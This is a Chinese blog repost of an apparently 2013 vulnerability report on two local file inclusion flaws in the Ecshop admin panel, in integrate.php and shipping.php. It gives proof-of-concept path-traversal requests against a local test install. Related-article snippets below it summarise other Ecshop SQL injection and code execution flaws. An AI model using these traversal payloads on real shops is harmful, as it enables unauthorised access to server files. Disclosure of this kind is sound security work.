integrate.php 漏洞,Ecshop后台两处本地文件包含漏洞

最新推荐文章于 2024-07-18 16:43:09 发布
最新推荐文章于 2024-07-18 16:43:09 发布
阅读量187 收藏
点赞数
文章标签: integrate.php 漏洞

### 简要描述:

整套程序当中对于某函数未做任何过滤........导致.......你猜.........

求礼物

### 详细说明:

第一个存在\admin\integrate.php文件中(其实还有好多,我找了两个代表的就提交了)

[4646464.png](https://images.seebug.org/upload/201307/07001532251cfe359c4bb15a6e249bee65bff3ba.png)

code通过post提交未过滤

第二个存在\admin\shipping.php

[QQ截图20130707002252.png](https://images.seebug.org/upload/201307/07003453fb950198a7aa24c12826b2e1ec98dcbc.png)

code通过get提交

### 漏洞证明:

我在根目录下有一个2.php文件内容是phpinfo

url:http://127.0.0.1/ec/admin/integrate.php?act=save_uc_config

post:code=..%2F..%2F..%2F2

[QQ截图20130707002252.png](https://images.seebug.org/upload/201307/07002304c761719aedb294c6d0ee934c69ca194e.png)

[2222222222.png](https://images.seebug.org/upload/201307/070023151cf3fbfce8e499b6495ac8a2dc4ec5d8.png)

post提交后复制返回内容保存到一个html文件中,打开

[2222222222.png](https://images.seebug.org/upload/201307/07002424bc465ffa8108572b90ce14772a9ede01.png)

----------------------------------------------------------------------------------

get方式的是

url:http://127.0.0.1/ec/admin/shipping.php?act=install&code=../../../2

[2222222222.png](https://images.seebug.org/upload/201307/070038493bd1c42eebac8966fd4f6488ddd98008.png)

loading-bars.svg

罗让
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ecshop V2.7.3 后台文件包含
明月踏歌行
10-24 1678
ecshop  V2.7.3 后台文件包含漏洞 鸡肋 admin/integrate.php c变量ode没做任何处理,直接post数据,act=check_config;code=xxx.php%00
integrate函数python_python scipy integrate.odeint用法及代码示例
weixin_39757739的博客
12-10 3342
整合常微分方程组。使用FORTRAN库odepack中的lsoda求解常微分方程组。解决一阶ode-s的刚性或非刚性系统的初值问题:dy/dt = func(y, t, ...) [or func(t, y, ...)]y可以是向量。注意缺省情况下,func的前两个参数的要求顺序与参数使用的系统定义函数中参数的顺序相反。scipy.integrate.ode类和函数scipy.integrate...
ecshop常见漏洞
10-30
ecshop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库;跨站攻击; ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop后台编辑文件/admin/shophelp.php中 shopinfo.php ,对输入参数$_POST['id']未进行正确类型转义,导致整型注入的发生;ecshop的/admin/comment_manage.php中,对输入参数sort_by、sort_order未进行严格过滤,导致SQL注入;ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库; ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入;ecshop的/includes/lib_insert.php文件中,对输入参数未进行正确类型转义,导致整型注入的发生。
Ecshop最新版v.272本地包含漏洞Oday
weixin_34183910的博客
01-12 422
很久前就发现了,今天发布出来吧,鸡肋的,其实很简单,就是很多人没有注意这里: 直接看代码: “js/calendar.php”: $lang = (!empty($_GET['lang'])) ? trim($_GET['la...
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 262
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复该漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
网站安全专家
09-13 2570
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用...
ECshop漏洞
12-09
只是一段小代码,可以检测出ECSHOP的一个致命漏洞
python scipy integrate_python – 使用scipy.integrate.quad来整合复数
weixin_35382961的博客
02-19 1307
把它分成实部和虚部是什么问题? scipy.integrate.quad需要集成的函数返回浮动(也称为实数)用于其使用的算法。import scipyfrom scipy.integrate import quaddef complex_quadrature(func, a, b, **kwargs):def real_func(x):return scipy.real(func(x))def i...
Integrate就医服务平台论文包含doc文件和PPT文件和说明文件和其它资料.rar
04-05
【描述】"包含doc文件和PPT文件和说明文件和其它资料"表明,这个压缩包中包含的不仅仅是论文本身,还有相关辅助材料。doc文件可能是论文的主体部分,详述了项目的研究背景、方法、结果和结论;PPT文件可能用于展示...
yolov8系列-- Food analysis baseline with Theseus. Integrate .zip
02-24
8. **代码结构与实践**:在kwan1120这个文件中,可能包含了训练脚本、配置文件、预处理代码、模型权重以及测试数据集。通过对这些文件的理解和运行,读者可以实际操作整个食品分析项目,学习如何将YOLOv8与Theseus...
中国城市发展战略绩效指标体系数据分析-Integrate.doc
09-30
中国城市发展战略绩效指标体系数据分析-Integrate.doc
ECSHOP漏洞利用
07-21
ECSHOP漏洞利用ECSHOP漏洞利用ECSHOP漏洞利用
ecshop初始化漏洞.rar
12-06
ecshop初始化漏洞
ECshop漏洞利用工具
11-11
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
ecshop 漏洞集合
12-01 2990
ECSHOP漏洞汇总-漏洞修改记录 更新时间:2017-03-23 点击量:1228 以下为网络内容转载,仅供技术研究。 1. 漏洞名称: ecshop注入漏洞修复 补丁编号: 2862905 补丁文件: /api/client/includes/lib_api.php 补丁来源: 云盾自研 更新时间: 漏洞描述: ecshop存在一个盲注漏洞,问题存在于/api/client/
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1455
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ecshop lib包含lib文件
weixin_34114823的博客
07-10 172
在lbi文件中增加lbi方法 方法1、 {include file='library/name.lbi '} 方法2、 <?php echo $this->fetch('library/name.lbi '); ?> 转载于:https://www.cnblogs.com/iz100/p/3182935.html...
Ecshop漏洞及修复
欣馨密语
05-11 1412
ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 */ if (get_magic_...
integrate.quad
04-27
`integrate.quad` 是 Python 中用于数值积分的函数,它可以用来计算一定区间内的定积分。具体而言,它的用法如下: ```python import scipy.integrate as spi def integrand(x): return x**2 result, error = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值